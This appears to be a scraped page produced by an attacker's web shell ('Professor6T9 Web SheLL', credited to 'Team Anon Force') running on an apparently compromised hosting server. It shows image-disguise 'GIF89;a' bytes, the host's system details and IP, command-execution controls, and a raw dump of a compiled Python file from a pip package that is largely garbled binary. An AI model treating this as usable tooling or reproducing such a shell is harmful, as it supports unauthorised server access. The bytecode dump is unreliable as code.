GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
alt
/
python37
/
lib
/
python3.7
/
site-packages
/
pip
/
_vendor
/
html5lib
/
_trie
/
__pycache__
[ HOME ]
Exec
Submit
File Name : _base.cpython-37.pyc
B ��Re� � @ sZ d dl mZmZmZ yd dlmZ W n ek rD d dlmZ Y nX G dd� de�ZdS )� )�absolute_import�division�unicode_literals)�Mappingc s: e Zd ZdZd� fdd� Zdd� Zdd� Zd d � Z� ZS )�TriezAbstract base class for triesNc s0 t t| ��� }� d krt|�S � fdd�|D �S )Nc s h | ]}|� � �r|�qS � )� startswith)�.0�x)�prefixr ��/builddir/build/BUILDROOT/alt-python37-pip-20.2.4-6.el8.x86_64/opt/alt/python37/lib/python3.7/site-packages/pip/_vendor/html5lib/_trie/_base.py� <setcomp> s zTrie.keys.<locals>.<setcomp>)�superr �keys�set)�selfr r )� __class__)r r r s z Trie.keysc C s$ x| � � D ]}|�|�r dS q W dS )NTF)r r )r r �keyr r r �has_keys_with_prefix s zTrie.has_keys_with_prefixc C sT || kr|S x:t dt|�d �D ]$}|d | � | kr |d | � S q W t|��d S )N� )�range�len�KeyError)r r �ir r r �longest_prefix s zTrie.longest_prefixc C s | � |�}|| | fS )N)r )r r �lprefixr r r �longest_prefix_item&